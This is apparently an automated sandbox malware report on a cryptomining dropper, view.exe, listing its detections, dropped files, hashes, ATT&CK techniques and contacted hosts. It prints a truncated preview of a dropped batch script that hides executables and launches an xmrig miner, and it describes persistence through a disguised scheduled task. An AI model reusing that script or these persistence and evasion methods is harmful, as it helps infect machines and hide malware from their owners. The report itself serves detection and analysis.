                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\view.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                        Source: C:\Users\user\Desktop\view.exeCode function: GetLocaleInfoA,
                        Source: C:\Users\user\Desktop\view.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                        Source: C:\ProgramData\screen.exeCode function: 8_2_00405CBA _strcmpi,GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,LocalFileTimeToFileTime,
                        Source: C:\Users\user\Desktop\view.exeCode function: 0_2_00412B80 GetVersionExA,

                        Lowering of HIPS / PFW / Operating System Security Settings:

                        barindex
                        Changes security center settings (notifications, updates, antivirus, firewall)
                        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                        Source: reg.exe, 00000016.00000002.271415904.00000000007CD000.00000004.00000001.sdmpBinary or memory string: |\??\C:\Windows\SysWOW64\en-US\KERNELBASE.dll.muins\MsMpEng.exe
                        Source: svchost.exe, 00000025.00000002.493848410.00000269E3040000.00000004.00000001.sdmpBinary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                        Source: svchost.exe, 00000025.00000002.493947291.00000269E3102000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolClipboard Data2Exfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsCommand and Scripting Interpreter12Image File Execution Options Injection1Image File Execution Options Injection1Obfuscated Files or Information21Security Account ManagerSystem Information Discovery33SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Registry Run Keys / Startup Folder1Process Injection22Software Packing11NTDSSecurity Software Discovery341Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1DLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion2Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection22/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 470322 Sample: view.exe Startdate: 24/08/2021 Architecture: WINDOWS Score: 100 54 prda.aadg.msidentity.com 2->54 56 clientconfig.passport.net 2->56 58 auth11.aeroadmin.com 2->58 62 Malicious sample detected (through community Yara rule) 2->62 64 Antivirus / Scanner detection for submitted sample 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 4 other signatures 2->68 11 view.exe 9 2->11         started        15 svchost.exe 2->15         started        17 svchost.exe 9 1 2->17         started        20 9 other processes 2->20 signatures3 process4 dnsIp5 46 C:\ProgramData\screen.exe, PE32 11->46 dropped 48 C:\ProgramData\xmrig.cmd, DOS 11->48 dropped 50 C:\Users\user\AppData\Local\Temp\unpro.exe, PE32 11->50 dropped 76 Contains functionality to detect sleep reduction / modifications 11->76 22 cmd.exe 1 11->22         started        78 Changes security center settings (notifications, updates, antivirus, firewall) 15->78 52 127.0.0.1 unknown unknown 17->52 file6 signatures7 process8 signatures9 72 Uses cmd line tools excessively to alter registry or file data 22->72 25 screen.exe 1 22->25         started        28 conhost.exe 22->28         started        30 choice.exe 1 22->30         started        process10 signatures11 74 Multi AV Scanner detection for dropped file 25->74 32 screen.exe 25->32         started        process12 process13 34 cmd.exe 35 32->34         started        signatures14 60 Uses cmd line tools excessively to alter registry or file data 34->60 37 reg.exe 1 1 34->37         started        40 conhost.exe 34->40         started        42 reg.exe 1 1 34->42         started        44 18 other processes 34->44 process15 signatures16 70 Creates an undocumented autostart registry key 37->70

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand
                        SourceDetectionScannerLabelLink
                        view.exe63%VirustotalBrowse
                        view.exe59%ReversingLabsWin32.Trojan.Graftor
                        view.exe100%AviraHEUR/AGEN.1119740
                        view.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\ProgramData\screen.exe12%VirustotalBrowse
                        C:\ProgramData\screen.exe17%MetadefenderBrowse
                        C:\ProgramData\screen.exe14%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\unpro.exe0%VirustotalBrowse
                        C:\Users\user\AppData\Local\Temp\unpro.exe0%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\unpro.exe0%ReversingLabs
                        SourceDetectionScannerLabelLinkDownload
                        8.0.screen.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                        9.0.screen.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                        0.0.view.exe.1b4c544.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                        0.2.view.exe.1b4c544.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                        SourceDetectionScannerLabelLink
                        clientconfig.passport.net0%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        https://xmrig.com/wizard%s0%URL Reputationsafe
                        https://xmrig.com/wizard0%URL Reputationsafe
                        https://%s.xboxlive.com0%URL Reputationsafe
                        http://www.nirsoft.netopenIf0%Avira URL Cloudsafe
                        https://dynamic.t0%URL Reputationsafe
                        https://xmrig.com/docs/algorithms0%URL Reputationsafe
                        https://%s.dnet.xboxlive.com0%URL Reputationsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        auth11.aeroadmin.com
                        37.48.87.53
                        truefalse
                          high
                          clientconfig.passport.net
                          unknown
                          unknownfalseunknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                            high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpfalse
                              high
                              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                  high
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpfalse
                                    high
                                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000022.00000003.309501692.00000155B1C48000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpfalse
                                        high
                                        https://xmrig.com/wizard%sRtkAudio.exefalse
                                        • URL Reputation: safe
                                        unknown
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpfalse
                                          high
                                          https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.nirsoft.netscreen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpfalse
                                                high
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000022.00000002.310249005.00000155B1C13000.00000004.00000001.sdmp, svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://xmrig.com/wizardRtkAudio.exefalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.netscreen.exe, 00000008.00000002.251856929.0000000000401000.00000040.00020000.sdmp, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpfalse
                                                    high
                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://%s.xboxlive.comsvchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      low
                                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000022.00000003.309501692.00000155B1C48000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.info-zip.org/zip-bug.html;view.exe, 00000000.00000003.236789443.0000000003924000.00000004.00000001.sdmp, unpro.exe.0.drfalse
                                                            high
                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000022.00000003.287812983.00000155B1C31000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://nircmd.nirsoft.netscreen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpfalse
                                                                    high
                                                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000022.00000003.287812983.00000155B1C31000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://nircmd.nirsoft.net/%s.htmlscreen.exe, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpfalse
                                                                          high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 0000000E.00000002.497000894.000001EE23600000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.nirsoft.netopenIfscreen.exe, 00000008.00000002.251856929.0000000000401000.00000040.00020000.sdmp, screen.exe, 00000009.00000002.252419669.0000000000401000.00000040.00020000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000022.00000003.309685565.00000155B1C40000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://dynamic.tsvchost.exe, 00000022.00000003.309501692.00000155B1C48000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000022.00000003.287812983.00000155B1C31000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://xmrig.com/docs/algorithmsRtkAudio.exefalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://activity.windows.comsvchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.bingmapsportal.comsvchost.exe, 00000022.00000002.310249005.00000155B1C13000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000022.00000003.309529010.00000155B1C60000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000022.00000002.310757725.00000155B1C3D000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://%s.dnet.xboxlive.comsvchost.exe, 0000001E.00000002.493904726.000002BC5AC3D000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                low
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000022.00000003.309620724.00000155B1C5A000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  IP
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                  Analysis ID:470322
                                                                                                  Start date:24.08.2021
                                                                                                  Start time:03:16:03
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 9m 8s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:light
                                                                                                  Sample file name:view.exe
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:44
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.evad.mine.winEXE@975/20@2/1
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HDC Information:Failed
                                                                                                  HCA Information:Failed
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  Warnings:
                                                                                                  • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.203.80.193, 96.16.150.73, 20.190.160.8, 20.190.160.2, 20.190.160.132, 20.190.160.69, 20.190.160.67, 20.190.160.134, 20.190.160.129, 20.190.160.73, 204.79.197.200, 13.107.21.200, 20.82.210.154, 93.184.220.29, 23.211.6.115, 23.211.4.86, 20.82.209.183, 20.54.110.249, 40.112.88.60
                                                                                                  • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, go.microsoft.com, ocsp.digicert.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                  TimeTypeDescription
                                                                                                  03:17:17API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                  03:19:09Task SchedulerRun new task: Intel(R)Updata path: "C:\Windows\INF\IntelSvc.exe"
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  C:\ProgramData\screen.exepip install.yp.exeGet hashmaliciousBrowse
                                                                                                    Proforma.exeGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Trojan.MulDrop17.50581.24010.exeGet hashmaliciousBrowse
                                                                                                        nCodePKIComponent_Setup_64_bit_java.exeGet hashmaliciousBrowse
                                                                                                          nCodePKIComponent_Setup_64_bit_java.exeGet hashmaliciousBrowse
                                                                                                            C:\Users\user\AppData\Local\Temp\unpro.exeCf9ZQeSpK3.exeGet hashmaliciousBrowse
                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):0.5965439553815473
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:blvyk1GaD0JOCEfMuaaD0JOCEfMKQmDl4Al/gz2cE0fMbhEZolrRSQ2hyYIIT:blhGaD0JcaaD0JwQQl4Ag/0bjSQJ
                                                                                                              MD5:9B0D4BCE4EF57735EAA5A48624C73F05
                                                                                                              SHA1:C8C8BE8AF7FF341ECF4F9C6922D1B390747B1D1E
                                                                                                              SHA-256:952812445EF9C04FF491AF7FD2B32512D658E59F12D3D8CFFB491C5CCAE0A6B4
                                                                                                              SHA-512:5CCEDBA7E646DE489A90B4DFAFE8FF98A096E0CB71FA81F3DC9F50C7D3386CAFDA432CCDBB0CE9917478240B97BD54E08971E1477CC09ED3DB645D788F91502F
                                                                                                              Malicious:false
                                                                                                              Preview: ....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x020c0911, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):0.09530852330435044
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Czzwl/+j1RIE11Y8TRXy7/UKAzzwl/+j1RIE11Y8TRXy7/UK:I0+j1O4blygKi0+j1O4blygK
                                                                                                              MD5:A763242878AC627AEEF2E61655EDF290
                                                                                                              SHA1:3C87E0054D0F1AE0BA743CA904ACAB4C3FA9420C
                                                                                                              SHA-256:8BADAAC13A9D35F8229EDE8C22EBF81CDB8499CE6F63E799F2953EBDE06C2C0B
                                                                                                              SHA-512:F006F87CD43F1DFAA4A5A7A8D2F8F128738ACC0DA33D18218F23CF4189D409A2A7DD34A462D69B3FFA48FD17E58DE925AFE6F217BD3C696C578DD0006612ED1D
                                                                                                              Malicious:false
                                                                                                              Preview: ....... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................q.S......y1m................q.......y1.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.11053016731116926
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:dil1Ev0WPzAMAl/bJdAtibNsw/Yll:dGQ0GzDAt4o/I
                                                                                                              MD5:DC80DCC30BDBA7CF7E0A74E29D70BA1F
                                                                                                              SHA1:D6C74EB22D8B5DF9F33C4AD92E4076B64E1DC323
                                                                                                              SHA-256:AAADEBEE9C37D5686E78D55C2C437B3C78E4202EFDFD2773F25852B23F5D3314
                                                                                                              SHA-512:B565D69FA575BC2833B6594BA5D01C762817CCD10E13AB5C7146FD07A18DE8443DDA0E81E155CB27F3AA09EB579AA1DB53DD3CB4C70EDBDDB6D947A5F5F657F5
                                                                                                              Malicious:false
                                                                                                              Preview: W........................................3...w.......y1......w...............w.......w....:O.....w..................q.......y1.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\ProgramData\loadhost.cmd
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1933
                                                                                                              Entropy (8bit):5.296998871329623
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:cliIwAb9OlS2bocsZYogpl2pXj4paNAnmAdXAnmAW0t7NAQL5qeBTmAdpAnUAPI6:cDMMTYx2lsixNBBSIw9
                                                                                                              MD5:3C58A0EFDF629CB29E06736A1B3B8297
                                                                                                              SHA1:F662C44CB9AF9A239F45705F228FE02E710D3B2E
                                                                                                              SHA-256:967ECF63F30EF999B02C887F8F319DC25EC340F378233A1601163ED7D8FAD5EB
                                                                                                              SHA-512:28B39B0882C15798D5BE62162C2F42BF93FB9489D48553F7EA5F949BE744B6D09EB81AB433118A9FBB3D7732EFB12A84B44F57C379BB4F3F7DC4B7F8BFD7596A
                                                                                                              Malicious:false
                                                                                                              Preview: @echo off..for %%a in (C:\ProgramData\Taskmg.exe) do if %%~za gtr 4325048 goto :SWTask..attrib -h -r -s "C:\Windows\SysWOW64\Taskmg.exe" >nul 2>nul..attrib -h -r -s "C:\ProgramData\Taskmg.exe" >nul 2>nul..copy /v /b /y "C:\Windows\SysWOW64\Taskmg.exe" "C:\ProgramData\Taskmg.exe" >nul 2>nul..attrib +h +r +s "C:\ProgramData\Taskmg.exe" >nul 2>nul..:SWTask..for %%a in (C:\ProgramData\screen.exe) do set scscname=%%~za..if "%scscname%" gtr "40568" (Set "Loadscsc=C:\ProgramData\screen.exe" &Goto :SWscr)..for %%a in (C:\ProgramData\Intel\screen.exe) do set scscname=%%~za..if "%scscname%" gtr "40568" (Set "Loadscsc=C:\ProgramData\Intel\screen.exe" &Goto :SWscr)..for %%a in (C:\Windows\SysWOW64\screen.exe) do set scscname=%%~za..if "%scscname%" gtr "40568" (Set "Loadscsc=C:\Windows\SysWOW64\screen.exe" &Goto :SWscr)..:SWscr..pushd "C:\ProgramData"..for %%a in (C:\ProgramData\xmrig.cmd) do set "szxmL1=%%~za"..if "0"=="0" Goto :DLL1..if "%szxmL1%"=="" Goto :DLL1..if %szxm% gtr 15 Goto :xcpyL1..if
                                                                                                              C:\ProgramData\screen.exe
                                                                                                              Process:C:\Users\user\Desktop\view.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                              Category:dropped
                                                                                                              Size (bytes):45568
                                                                                                              Entropy (8bit):7.750275657742685
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
                                                                                                              MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                                                                              SHA1:60E2F48A51C061BBA72A08F34BE781354F87AA49
                                                                                                              SHA-256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
